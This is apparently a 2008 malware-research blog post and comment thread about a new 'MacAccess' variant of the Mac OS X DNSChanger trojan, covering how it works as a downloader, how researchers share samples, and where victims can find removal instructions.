What’s new? Here’s a static analysis of this new variant. Notice the header, it seems the compression used was changed.
The preinstall/preupgrade script now looks like this:
Which previous variants contains code or sequence of strings as follows:
Before,the installer name was “MacVideo” and “Porn4Mac”, today it’s “MacAccess”.
Most known IPs and nodes of this threats is currently active serving this variant.
Stay safe and report Dodgy websites!
“Notice the header, it seems the compression used was changed”…
Why do you look at the disk image? It’s just an archive which changes each time you create a new image with the same content.
What you didn’t notice is that it is a Downloader.
In the last uudecode stage there’s a perl script which download binaries and launch them in a loop.
The server is down now, but yesterday I downloaded 2 files with different lengths. That’s a new DNSChanger variant.
Comment by Steve — November 19, 2008 @ 2:44 pm |
Thanks Steve! i already got “jah” and “withlove” =) Btw, I sent you an email offline.
Comment by Methusela Cebrian Ferrer — November 23, 2008 @ 6:02 am |
you can see a screenchot of RSPLUG-D from the Intego security memo webpage :
http://www.intego.com/news/ism0806.asp
Comment by frolika — November 26, 2008 @ 6:05 pm |
Greetings,
I was wondering if it would be possible for you to send us samples of the new DNSChanger variant for OS X for further analysis. Thank you for your time and assistance!
Comment by Nicholas Ptacek — December 1, 2008 @ 7:20 pm |
Hi Nicholas, i’ll send you an email offline.
Comment by Methusela Cebrian Ferrer — December 3, 2008 @ 12:24 am |
[...] installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and [...]
Pingback by Can Apple Keep Malware Away? | TrendLabs | Malware Blog - by Trend Micro — December 4, 2008 @ 2:03 pm |
what if I accidently installed it? how can I remove it now and make sure that I dont not have a virus on my computer??
Comment by m — December 11, 2008 @ 2:55 am |
Hello, i don’t know how to uninstall this “MacAccess”, I installed it accidentally and now It doesn’t appear in my Finder, what should I do?
Comment by Ismael — December 11, 2008 @ 9:47 am |
[...] installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and [...]
Pingback by Can Apple Keep Malware Away? | Top Tech News, LIVE — December 12, 2008 @ 9:38 am |
I just accidently installed macAccess too. What can I do?
Comment by Jacob — December 19, 2008 @ 5:00 am |
same problem with me.. heeeelp how to uninstall this ????
Comment by erico dias — December 23, 2008 @ 11:04 am |
For more information on how to delete malicious files created by this exploit, go to http://ithreats.wordpress.com/2008/01/11/analysis-of-osx-trojan-dns-changer/ inside this same site. It’s a very good analysis and how to solve recipe. After the very clear explanation on comments, I eliminated the file created by the installer package and voila. Even better than VirusBarrier and without paying even a penny.
Hope this could be useful. Cheers!
Comment by Arty — December 24, 2008 @ 3:43 am |
Cheers Arty!
I have been receiving continuous infection report about this threat and I can’t help but to reply and send manual removal instruction to each email I receive. So, I decided to publish a step-by-step removal instruction here:
http://ithreats.wordpress.com/2008/12/26/how-to-remove-macaccess-trojan/
I hope this helps!
~ Meths
Comment by Methusela Cebrian Ferrer — December 26, 2008 @ 12:17 pm |
Dear Meths. I’ve seen your entry and I found it perfect for all folks that could have problems with this trojan. I’m sure that your explanation will be very useful (more useful that any anti-virus program, as this ones does not detect reliably this kind of infections).
~Arty
Comment by Arty — December 31, 2008 @ 3:04 am |